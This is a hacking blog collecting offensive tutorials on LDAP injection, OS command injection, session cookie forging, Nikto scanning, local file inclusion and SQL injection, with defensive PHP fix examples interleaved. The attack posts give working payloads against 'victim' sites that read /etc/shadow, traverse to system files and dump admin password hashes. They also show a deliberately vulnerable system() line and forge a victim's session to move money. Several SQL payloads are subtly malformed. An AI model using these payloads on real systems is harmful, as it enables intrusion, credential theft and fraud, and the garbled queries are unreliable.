LDAP injection!!

The site has moved to the root domain, where all posts have been imported. Please go to http://pusheax.com/

LDAP = Lightweight Directory Access Protocol. This protocol is used to access a directory server over the network, and it uses port 389.

If you don’t know about LDAP then here you go: http://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol

LDAP directories also store names, credit card numbers, email addresses and other information. LDAP is exploitable like other databases, and LDAP injection is similar to SQL injection.

NOTE: Remember, I am telling you what I do, so feedback is welcome. I am not a master and I don’t want to be a master.

Suppose there is a web site which allows us to search it. I simply put “*” in the search field and click the search button. If the site is really dealing with LDAP, the “*” will match every directory entry and all of the information will be output on the page.

If it is a URL then it would be like: www.example.com/search.asp?vulnerable=*

Simple way to identify the vulnerability (Bad Input):





Try more…
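How the “*” probe above is neutralised on the server side, as an added example (not code from the original post): the search term is escaped per RFC 4515 before it is placed in the filter. The `cn` attribute and the function names are assumptions.

```php
<?php
declare(strict_types=1);

/**
 * Escape a value for use inside an LDAP search filter (RFC 4515).
 * With the ldap extension loaded, ldap_escape($v, '', LDAP_ESCAPE_FILTER)
 * does the same job; this version has no extension dependency.
 */
function escape_filter_value(string $value): string
{
    // strtr() replaces every key in a single pass, so a backslash emitted by
    // one replacement is never escaped a second time.
    return strtr($value, [
        '\\' => '\\5c',
        '*'  => '\\2a',
        '('  => '\\28',
        ')'  => '\\29',
        "\0" => '\\00',
    ]);
}

// Vulnerable: the search term is pasted into the filter as-is, so "*"
// keeps its wildcard meaning and matches every entry.
function unsafe_filter(string $term): string
{
    return '(cn=' . $term . ')';
}

// Hardened: whatever the user types can only ever be a literal value.
function safe_filter(string $term): string
{
    return '(cn=' . escape_filter_value($term) . ')';
}

// Hardened substring search: the wildcards are added by the server, the
// user-supplied part between them is still escaped.
function safe_contains_filter(string $term): string
{
    return '(cn=*' . escape_filter_value($term) . '*)';
}

// Constructed sample inputs: a normal name, the "*" probe from the post,
// and a legitimate value that happens to contain filter metacharacters.
foreach (['alice', '*', 'Smith (contractor)'] as $term) {
    echo 'input:    ', $term, "\n";
    echo '  unsafe:   ', unsafe_filter($term), "\n";
    echo '  safe:     ', safe_filter($term), "\n";
    echo '  contains: ', safe_contains_filter($term), "\n";
}
```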

Hacking is not a crime. It is philosophy, it is research!!!

OS command injection vulnerability


An “OS = Operating System” command injection vulnerability is a high-impact vulnerability for a server/website. If a website has an OS command injection vulnerability, a malicious hacker can compromise the website or even the server's operating system. If a hacker can detect the vulnerability then he can run any operating system command. For example, if I run the command “rm -r /var/www” on my computer then it is going to remove “www”, but what if I run this command on my victim’s computer?

How we detect this vulnerability:

Suppose our target address is www.victim.com/vultest/lame.php

And the source code:
<title>Vulnerable Page</title>
<p><b>We will test  OS command injection vulnerability against this pages. Actually developer don’t know how serious the code is.</b></p>

<p><b>Output of command:</b></p>

<p><b><i>This is how OS command injection vulnerability works.</i></b></p>

That page also contains this PHP code:

<?php system($_REQUEST['cmd']); // deliberately vulnerable: the request parameter is run as a shell command ?>

(This is white box... Just copy it and paste it into a PHP web page for practice purposes.)

This is the OS command injection vulnerability. Because of this simple mistake anyone can run any OS-specific command against the server/website.

So if we run a simple command, "ping":

We get the reply on the page (along with the other contents). In a real-world test we may not see the reply, but the response is delayed for some time (4-10 seconds?). If this is the case then we can run any command, such as "ls".

If any of these statements is in the source code:


Then it is highly likely that the site is vulnerable.

Suppose we don't have the source code; then how do we test? The way is fuzzing (with tools or manually). Sometimes we call it black box testing.

To test it we need to write some code for fuzzing, or we can use ready-made tools which are freely downloadable from the internet, such as Burp Suite, wfuzz or a vulnerability scanner, or test manually by hand. I think you have the logic for automated testing; otherwise you get some "False" results from your lam0 tools...

Exploitation : 

Note: Doing it on localhost


It output:


We can run any command:

http://localhost/vultest/lame.php?cmd=cat /etc/passwd
http://localhost/vultest/lame.php?cmd=cat /etc/hosts
http://localhost/vultest/lame.php?cmd=cat /etc/shadow (Require root)
http://localhost/vultest/lame.php?cmd=cp /db/to/mysql /here
http://localhost/vultest/lame.php?cmd=cat wget
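The fix for lame.php, as an added example (not code from the original post): the request supplies only data for one fixed program, the value is validated, and the program is started without a shell. The function names and the choice of ping as the single allowed action are assumptions; `-c 1` assumes a Linux or macOS ping.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern from the post, for comparison (not executed here):
//   system($_REQUEST['cmd']);   // the request parameter *is* the command line

/**
 * Hypothetical replacement: the page offers one fixed action (ping) and the
 * request supplies only the host. Returns an argv array, or null when the
 * value is not a plain IP address or hostname.
 */
function build_ping_argv(string $host): ?array
{
    $isIp   = filter_var($host, FILTER_VALIDATE_IP) !== false;
    // Letters, digits, dots and hyphens only; must start and end alphanumeric,
    // so the value can never look like an option ("-x") or contain spaces.
    $isName = preg_match('/\A[a-z0-9](?:[a-z0-9.-]{0,251}[a-z0-9])?\z/i', $host) === 1;
    if (!$isIp && !$isName) {
        return null;
    }
    // Program and options are fixed; the host is exactly one argv element.
    return ['ping', '-c', '1', $host];
}

/**
 * Run an argv array without a shell (array form of proc_open, PHP 7.4+), so
 * characters such as ; | & $ ` have no special meaning.
 */
function run_without_shell(array $argv): array
{
    // stdout is captured, stderr is merged into it.
    $spec = [1 => ['pipe', 'w'], 2 => ['redirect', 1]];
    $proc = proc_open($argv, $spec, $pipes);
    if (!is_resource($proc)) {
        return ['exit' => -1, 'output' => ''];
    }
    $output = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    return ['exit' => proc_close($proc), 'output' => (string) $output];
}

// Constructed inputs: one valid host, then command strings of the kind the
// post sends to lame.php. Those are rejected before anything is executed.
foreach (['127.0.0.1', 'cat /etc/passwd', '127.0.0.1; ls'] as $input) {
    $argv = build_ping_argv($input);
    if ($argv === null) {
        echo 'rejected: ', var_export($input, true), "\n";
        continue;
    }
    $result = run_without_shell($argv);
    // htmlspecialchars() because on a real page the output is placed in HTML.
    echo "exit {$result['exit']}:\n", htmlspecialchars($result['output']), "\n";
}
```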


I hope I explained it and now we know what it is and how it can be exploited by hackers. But really it is very basic; you need to be more advanced.

Let me know (sec00rit3y@gmail.com) if you have any questions.

Good luck !!!   

Breaking The sessions


Sessions are important for security. If an attacker can break the session/cookie of an active user then he or she can access that account as the user without any password. Some attackers don’t care about sessions, maybe because they don’t know much about them or find them boring. But how does a serious hacker take advantage? Do they just want to get the password easily, or only by an SQL injection? No. A serious hacker actually looks for a hint (simple vulnerability + free simple tools) that lets him go further. Anyway, I will explain only a little about breaking sessions, because you need to research yourself to learn something good.

When we deal with sessions:

When we can register on a website, log in, transfer data, etc. The session is active until we log out. If the site did not manage sessions for an active account then we would need to log in every second.
Anyway, when the user logs in, the website saves the session for the next login (cookie?). What about when we see something like “Keep me logged in always on this site”? Even if you browse the site after 3 days, you will still see that you are logged in without a username and password. So if we log in to a website for the first time, the site will do:

1. Set a cookie = dXNlcj1leHBsb2l0O2VtYWlsPXNlY0Bkb21haW4uY29tO2lwPTEuMS4xLjE7

2. Session = dXNlcj1leHBsb2l0O2VtYWlsPXNlY0Bkb21haW4uY29tO2lwPTEuMS4xLjE7

So I think that now you know how a “session” works.

If the session is compromised by someone then he/she can use this session to log in as the user without any password.

How a hacker can break sessions:

There are several ways of breaking sessions. Developers often make mistakes when managing sessions. The most common vulnerabilities are:

1. Time-based
2. Meaningful
3. Predictable

Just for understanding, I am explaining the “meaningful session” vulnerability.

Suppose we logged in to our bank “www.bank.com”, and our username is “exploit” and password “SecUritYY”. After logging in to the site we see in the address bar that the URL is like:

The URL is really suspicious. It is using base64 as the session ID. So if we decode the base64 value then we get:


We see some juicy information but not the password. But we can still use this session to attack other accounts. How?

If we know a correct username, email and IP (requires some social engineering?) then we can make a new session to break into the target account. For example, our victim’s information (I got some information by SE):

user: dollar
email: giveme@victime.org
ip: (Lol This fool clicked on a link)

Now we can encode this information as base64 and edit our cookie or submit it directly in the URL bar (because it is the GET method). I really hope you logged in and then transferred some $$$ to your account? 😉

Hope you understand something about attacking the session…
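What a session token should look like instead, as an added example (not code from the original post): an opaque random ID whose meaning exists only on the server, which avoids all three mistakes listed above (time-based, meaningful, predictable). The `SessionStore` class and its in-memory array are assumptions; a real site would back it with a database, a cache or PHP's built-in session handler.

```php
<?php
declare(strict_types=1);

// The cookie value shown in the post is only base64: anyone can read it and
// anyone can build another one, because no secret is involved.
$fromPost = 'dXNlcj1leHBsb2l0O2VtYWlsPXNlY0Bkb21haW4uY29tO2lwPTEuMS4xLjE7';
echo 'decoded cookie from the post: ', base64_decode($fromPost), "\n";

/** Hypothetical in-memory session store. */
final class SessionStore
{
    /** @var array<string, array{user: string, expires: int}> */
    private array $sessions = [];

    /** Create a session and return the token to put in the cookie. */
    public function issue(string $user, int $ttlSeconds = 1800, ?int $now = null): string
    {
        // 256 bits from the OS CSPRNG: carries no user data and cannot be
        // derived from the login time or from another user's token.
        $token = bin2hex(random_bytes(32));
        // Only a hash is stored, so a leaked session table yields no tokens.
        $this->sessions[hash('sha256', $token)] = [
            'user'    => $user,
            'expires' => ($now ?? time()) + $ttlSeconds,
        ];
        return $token;
    }

    /** Return the user name for a live token, or null. */
    public function lookup(string $token, ?int $now = null): ?string
    {
        $key = hash('sha256', $token);
        $session = $this->sessions[$key] ?? null;
        if ($session === null) {
            return null;                       // never issued, or revoked
        }
        if (($now ?? time()) >= $session['expires']) {
            unset($this->sessions[$key]);      // expired: forget it
            return null;
        }
        return $session['user'];
    }

    /** Log out: the token stops working immediately. */
    public function revoke(string $token): void
    {
        unset($this->sessions[hash('sha256', $token)]);
    }
}

// Constructed demo with a fixed clock so the expiry case is reproducible.
$store = new SessionStore();
$token = $store->issue('exploit', 1800, 1000);

var_dump($store->lookup($token, 1500));        // live token issued by the store
var_dump($store->lookup($fromPost, 1500));     // self-made token from the post
var_dump($store->lookup($token, 1000 + 1800)); // same token after its lifetime
```

Send the token in a cookie marked `HttpOnly` and `Secure` rather than in the URL, where it ends up in logs and browser history.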

Special Note: You should research seriously, otherwise you will not learn anything from a ready-made tutorial (such as a free tutorial). You should find the way from a very simple hint. Don’t think anyone will do everything for you. Just remember, self-help is the best help (just sometimes you need hints?).

If you find any mistakes/errors then please feel free to contact me (I love to fix myself).

Good Luck guys!!!

My favorite website which may help you a lot for learning Computer exploit and Hacking


1. Exploit Writing:

I love this site. It has a lot of information and tutorials. If you are interested in writing exploits then go to corelan. There are currently 11 exploit writing tutorials, which go from basic to advanced and are even better than other commercial courses.

Thanks, Peter (respect)

2. Vulnerability Research:

If you are serious then you need these sites. We always need to search for new/old vulnerabilities, so these sites are very good for starting:

2.1. Exploit-db
2.2. securityfocus
2.3. osvdb.org
2.4. web.nvd.nist.gov

3. Metasploit:

Metasploit is a popular framework for pentesting. Metasploit is very useful for quick shellcoding.

Nikto web vulnerability scanner.


Most of the time I use Nikto for scanning target websites. It is easy but really powerful. Sometimes it sucks too, because of false positives. I will just show how to scan your own site. It scans CGI and default files and directories.

Warning: Don’t do anything illegal. I am just sharing how I practice. If you are a black hat hacker and are going to attack a third-party website, or do anything illegal, then I am not responsible for that…

I believe sharing knowledge means increasing knowledge.

Nikto is a Perl script, so we need to install Perl to play with it (be aware, Windows users). If you don’t have this tool yet then go and download it:
http://cirt.net/nikto2 . It is installed by default in Backtrack.

Simply:

root@bt:cd /pentest/web/nikto

root@bt:/pentest/web/nikto# ./nikto.pl -Help

       -ask+               Whether to ask about submitting updates
                               yes   Ask about each (default)
                               no    Don’t ask, don’t send
                               auto  Don’t ask, just send
       -Cgidirs+           Scan these CGI dirs: “none”, “all”, or values like “/cgi/ /cgi-a/”
       -config+            Use this config file
       -Display+           Turn on/off display outputs:
                               1     Show redirects
                               2     Show cookies received
                               3     Show all 200/OK responses
                               4     Show URLs which require authentication
                               D     Debug output
                               E     Display all HTTP errors
                               P     Print progress to STDOUT
                               S     Scrub output of IPs and hostnames
                               V     Verbose output
       -dbcheck           Check database and other key files for syntax errors
       -evasion+          Encoding technique:
                               1     Random URI encoding (non-UTF8)
                               2     Directory self-reference (/./)
                               3     Premature URL ending
                               4     Prepend long random string
                               5     Fake parameter
                               6     TAB as request spacer
                               7     Change the case of the URL
                               8     Use Windows directory separator (\)
                               A     Use a carriage return (0x0d) as a request spacer
                               B     Use binary value 0x0b as a request spacer
        -Format+           Save file (-o) format:
                               csv   Comma-separated-value
                               htm   HTML Format
                               msf+  Log to Metasploit
                               nbe   Nessus NBE format
                               txt   Plain text
                               xml   XML Format
                               (if not specified the format will be taken from the file extension passed to -output)
       -Help              Extended help information
       -host+             Target host
       -IgnoreCode        Ignore Codes–treat as negative responses
       -id+               Host authentication to use, format is id:pass or id:pass:realm
       -key+              Client certificate key file
       -list-plugins      List all available plugins, perform no testing
       -maxtime+          Maximum testing time per host
       -mutate+           Guess additional file names:
                               1     Test all files with all root directories
                               2     Guess for password file names
                               3     Enumerate user names via Apache (/~user type requests)
                               4     Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
                               5     Attempt to brute force sub-domain names, assume that the host name is the parent domain
                               6     Attempt to guess directory names from the supplied dictionary file
       -mutate-options    Provide information for mutates
       -nocache           Disables the response cache
       -nointeractive     Disables interactive features
       -nolookup          Disables DNS lookups
       -nossl             Disables the use of SSL
       -no404             Disables nikto attempting to guess a 404 page
       -output+           Write output to this file
       -Pause+            Pause between tests (seconds, integer or float)
       -Plugins+          List of plugins to run (default: ALL)
       -port+             Port to use (default 80)
       -RSAcert+          Client certificate file
       -root+             Prepend root value to all requests, format is /directory
       -Single            Single request mode
       -ssl               Force ssl mode on port
       -Tuning+           Scan tuning:
                               1     Interesting File / Seen in logs
                               2     Misconfiguration / Default File
                               3     Information Disclosure
                               4     Injection (XSS/Script/HTML)
                               5     Remote File Retrieval – Inside Web Root
                               6     Denial of Service
                               7     Remote File Retrieval – Server Wide
                               8     Command Execution / Remote Shell
                               9     SQL Injection
                               0     File Upload
                               a     Authentication Bypass
                               b     Software Identification
                               c     Remote Source Inclusion
                               x     Reverse Tuning Options (i.e., include all except specified)
       -timeout+          Timeout for requests (default 10 seconds)
       -Userdbs           Load only user databases, not the standard databases
                               all   Disable standard dbs and load only user dbs
                               tests Disable only db_tests and load udb_tests
       -until             Run until the specified time or duration
       -update            Update databases and plugins from CIRT.net
       -useproxy          Use the proxy defined in nikto.conf
       -Version           Print plugin and database versions
       -vhost+            Virtual host (for Host header)
                + requires a value

If we give the command ./nikto.pl -Help or perl nikto.pl -Help then we get the details of all options.

We are simply going to scan our own company’s website, because we are pentesting it. So easy:

root@bt:/pentest/web/nikto# ./nikto.pl -h target.com :

I have tested it on my localhost to paste here. This is the output/vulnerabilities we may get:

root@bt:/pentest/web/nikto# ./nikto.pl -h target.com
– Nikto v2.1.5
+ Target IP:          ip address
+ Target Hostname:    target.com
+ Target Port:        80
+ Start Time:         2012-01-21 13:48:22 (time formate)
+ Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/
+ Retrieved x-powered-by header: PHP/5.2.17
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/1.0.0-fips appears to be outdated (current is at least 1.0.0d). OpenSSL 0.9.8r is also current.
+ FrontPage/ appears to be outdated (current is at least (may depend on server version)
+ FrontPage – http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html
+ mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/ – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm — a DoS was not attempted.
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root’s home directory.
+ /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
+ /cgi-sys/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ Default account found for ‘Secured Frontpage on PennyStockAdvice.com’ at /_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals (ID ”, PW ‘_Cisco’). Cisco device.
+ OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /cgi-sys/mchat.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /cgi-sys/scgiwrap: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /stats/: This might be interesting…
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
+ OSVDB-3268: /_vti_bin/: Directory indexing found.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: : Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ OSVDB-3092: /as/: This might be interesting… potential country code (American Samoa)
+ OSVDB-3092: /ms/: This might be interesting… potential country code (Montserrat)
+ 6474 items checked: 3 error(s) and 32 item(s) reported on remote host
+ End Time:           2012-01-21 13:58:55 (Time formate) (4233 seconds)
+ 1 host(s) tested

As you can see, there are many things Nikto found. Nikto is very effective for finding default files and directories.

Note: you have to understand the output of tools, otherwise you can do nothing.

We can use various options (see help). For example, a command:

root@bt:/pentest/web/nikto#./nikto.pl -host target.com -root /admin -port 443 -evasion 1

How does this work? Simple:
-host = -h (the target site)
-root = send all requests to the /admin directory
-port = the site is not running on the default port 80; I know it is running on 443.
-evasion = IDS evasion. Evasion 1 (Random URI encoding (non-UTF8))

I hope you got some idea about it… Just try to believe that people do not need hacking training to learn to use tools.

If your mind is skid then tools may not help you... Be aware of that before using tools.

For more information visit http://cirt.net/nikto2

Good Luck!!!

Exploiting Local File Inclusion vulnerability(LFI)


Local File Inclusion means loading a local file such as /etc/passwd or /etc/hosts in a PHP web page. There are many programming mistakes that cause this vulnerability. It occurs when the programmer puts some bad code in the PHP web pages:


For example, suppose a page contains:

$vulnerable = $_GET['vulnerable'];
include($vulnerable); # this may also be require, require_once, fopen, etc.

This code is vulnerable to Local File Inclusion.

Suppose our target URL is www.n00bprogammer.com/vulnerable/

If you submit this URL directly in the browser address bar then you get a web page. That means there is a file “index.php”.

If we try like:

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../etc/passwd (did not work)


And it outputs:
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
snort:x:107:115:Snort IDS:/var/log/snort:/bin/false

That means it worked. But modern Unix-like systems no longer include the hashes in /etc/passwd (all hashes are in /etc/shadow), so without permission you can’t read the /etc/shadow file.

There are many files you may be interested in reading:

/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log

There are many sites which have an unnecessary URL variable with a file extension... They use the value for a php, image or asp file. This is not secure at all. For example:


This may also be vulnerable to LFI... Try.
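The server-side fix for the include pattern above, as an added example (not code from the original post): the request supplies a short page key, the server maps it to a file name it chose itself, and the resolved path is checked to stay inside the page directory. The page keys, file names and the `resolve_page` helper are assumptions.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern from the post, for comparison (not executed here):
//   include($_GET['vulnerable']);   // the request chooses the file path

/**
 * Hypothetical resolver. Returns an absolute path inside $baseDir that is
 * safe to include, or null when the request must be refused.
 */
function resolve_page(string $baseDir, string $key): ?string
{
    // Allowlist: the request can only pick one of these entries.
    $pages = ['home' => 'home.php', 'contact' => 'contact.php'];
    if (!isset($pages[$key])) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves ".." and symlinks and returns false when the
    // file does not exist.
    $path = realpath($base . DIRECTORY_SEPARATOR . $pages[$key]);
    if ($path === false) {
        return null;
    }
    // Defence in depth: the resolved file must still sit under the base
    // directory, even if an allowlisted name is later replaced by a symlink.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo: a throwaway page directory that holds a single page.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', "<?php echo 'home page';\n");

// A valid key, an allowlisted key whose file is missing, the traversal
// string from the post, an absolute path, and a raw file name.
foreach (['home', 'contact', '../../etc/passwd', '/etc/passwd', 'home.php'] as $key) {
    $path = resolve_page($dir, $key);
    echo str_pad(var_export($key, true), 22),
         $path === null ? 'rejected' : 'include ' . basename($path), "\n";
}

unlink($dir . DIRECTORY_SEPARATOR . 'home.php');
rmdir($dir);
```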

Advanced hackers can go deeper, such as:

1. There are some special ways of attacking the application tier for rooting the system (Hint: overwriting error_log).
2. Reading more advanced files (Hint: SQL).

Try them, research and learn...
Read more: http://en.wikipedia.org/wiki/Remote_file_inclusion 

Let me know if you have any questions, please...

SQL injection explained


Today I will explain SQL injection. Input-based attacks are the most effective for testing web security, and SQL injection is the most popular for web hacking. No waiting, let’s start (hey, I am not going to explain what SQL injection is; it is how to exploit).

Testing if the target is vulnerable:

Suppose the target site is http://www.victim.com. We can quickly gather some information with Google to find some parameter-based URLs. Simply go to Google and search like:

site:www.victim.com filetype:php

(Note: I think you already gathered some information about the site, so you know what their file extension is. If you are attacking randomly then go away from here.)

Then we see many results like:



Simply browse to www.victim.com/something.php?id=3 and add one more thing. Example:


If the site is vulnerable then we will see an SQL error like:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” AND products.obsolete=’N” at line 1

If we see this error on that page then we have confirmed the site is vulnerable and exploitable.


Finding the number of columns:

First we will check how many columns are available with an “ORDER BY” query. If we go past the number of available columns then we will get the error “Unknown Column”.

No error:

www.victim.com/something.php?id=3 ORDER BY 4–

No error:

www.victim.com/something.php?id=3 ORDER BY 5–


www.victim.com/something.php?id=3 ORDER BY 6–

Now we have confirmed that it has 6 columns. If you get no error then try more columns: 7, 8, 9, etc.

How to find the vulnerable column

To find the vulnerable columns we need the “UNION SELECT” command. So:

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,5,6–

Now we will see a number from 1-6 (one or several) on the page. Suppose we see “5”.

So now we know column number 5 is vulnerable.

Checking the MySQL version :

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,@@version,6–

We know the MySQL version is 5(version 4 won’t work).

Great! Now we quickly need their users database dump. So quick!!!

Now we need all the table names.

Getting table names

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_scheam=database()–

So we get several table names. For example we get:





We want to log in as a powerful user so that we can edit their pages. To do this we first need to find out the column names:

Getting column names:

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,group_concat(columns_name),6 from information_schema.tables where table_name=users–

So from this query we get output like :


It is easy to understand that we need the username and password columns to get admin access:

Grabbing The username and password:

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,group_concat(username,0x3a,password),6 from users–

So you get all usernames and passwords in the output, like admin:akde3d09kd4ur489deqa9094ldad48dkr


Now crack the hash and then log in with the username “admin” or “super” and the plain text (cracked) password.

If you don’t know how to crack hashes, check out other articles…

There are many SQL injection techniques, but I explained here the one which is very common. So try more, research and research.

I hope there are some mistakes I made… If you can catch them then feel free to contact me.
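Why none of the steps above work against a parameterised query, as an added example (not code from the original post): the `id` parameter is validated as an integer, bound as a value, and database errors go to the server log instead of the page. The `products` table, its columns and the function names are assumptions modelled on the error message quoted earlier; the demo uses an in-memory SQLite database and needs the pdo_sqlite extension.

```php
<?php
declare(strict_types=1);

// Constructed in-memory database so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, obsolete TEXT)');
$db->exec("INSERT INTO products (id, name, obsolete) VALUES (3, 'widget', 'N')");

// Vulnerable pattern, for comparison (not executed here):
//   $db->query("SELECT id, name FROM products WHERE id = " . $_GET['id']
//              . " AND obsolete = 'N'");

/** Look up one product by the raw "id" request parameter. */
function find_product(PDO $db, string $rawId): ?array
{
    // 1. The parameter must be a positive integer and nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    try {
        // 2. The SQL text is constant; the value travels separately and is
        //    never parsed as SQL.
        $stmt = $db->prepare(
            "SELECT id, name FROM products WHERE id = :id AND obsolete = 'N'"
        );
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    } catch (PDOException $e) {
        // 3. Database errors go to the server log, never into the page, so
        //    the response gives no syntax-error feedback.
        error_log('product lookup failed: ' . $e->getMessage());
        return null;
    }
}

/** Free-text parameters cannot be range-checked, but they can be bound. */
function find_by_name(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT id, name FROM products WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a valid id, then parameter values of the shape used
// in the post. The last two never reach the database.
foreach (['3', '3 ORDER BY 6', '-3'] as $rawId) {
    echo str_pad(var_export($rawId, true), 18), json_encode(find_product($db, $rawId)), "\n";
}

// A bound string containing a quote is plain data: no syntax error, no rows.
echo json_encode(find_by_name($db, "widget'")), "\n";
```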

Good Luck!!!